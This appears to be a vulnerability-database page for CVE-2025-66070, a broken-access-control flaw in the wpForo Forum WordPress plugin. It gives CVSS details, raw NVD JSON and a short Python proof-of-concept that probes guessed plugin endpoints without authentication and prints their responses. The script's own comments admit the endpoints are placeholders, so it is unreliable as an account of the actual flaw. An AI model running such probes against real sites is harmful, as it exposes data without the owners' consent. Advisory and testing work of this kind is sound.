Security Vulnerability Report
中文
CVE-2025-66070 CVSS 7.5 HIGH

CVE-2025-66070

Published: 2025-12-18 08:16:15
Last Modified: 2026-04-27 18:16:33

Description

Missing Authorization vulnerability in Tomdever wpForo Forum wpforo allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects wpForo Forum: from n/a through <= 2.4.10.

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

No configuration data available.

wpForo Forum <= 2.4.10

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests # CVE-2025-66070 PoC - wpForo Forum Broken Access Control # Target: WordPress site with wpForo Forum plugin <= 2.4.10 TARGET_URL = "http://target-wordpress-site.com" def check_vulnerability(): """ Check if the target is vulnerable to CVE-2025-66070 Missing Authorization in wpForo Forum plugin """ # Try to access protected endpoint without authentication # Replace /wp-json/wpforo/v1/ with actual vulnerable endpoint vulnerable_endpoints = [ "/wp-json/wpforo/v1/settings", "/wp-json/wpforo/v1/users", "/wp-json/wpforo/v1/forums", "/wp-admin/admin-ajax.php?action=wpforo_api" ] for endpoint in vulnerable_endpoints: url = f"{TARGET_URL}{endpoint}" try: response = requests.get(url, timeout=10, verify=False) # If we get a 200 response instead of 401/403, vulnerability exists if response.status_code == 200: print(f"[+] VULNERABLE: {url}") print(f"[+] Response: {response.text[:500]}") return True except requests.exceptions.RequestException as e: print(f"[-] Error accessing {url}: {e}") print("[-] Target may not be vulnerable") return False if __name__ == "__main__": check_vulnerability()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-66070", "sourceIdentifier": "[email protected]", "published": "2025-12-18T08:16:15.283", "lastModified": "2026-04-27T18:16:33.170", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in Tomdever wpForo Forum wpforo allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects wpForo Forum: from n/a through <= 2.4.10."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/wpforo/vulnerability/wordpress-wpforo-forum-plugin-2-4-10-broken-access-control-vulnerability?_s_id=cve", "source": "[email protected]"}]}}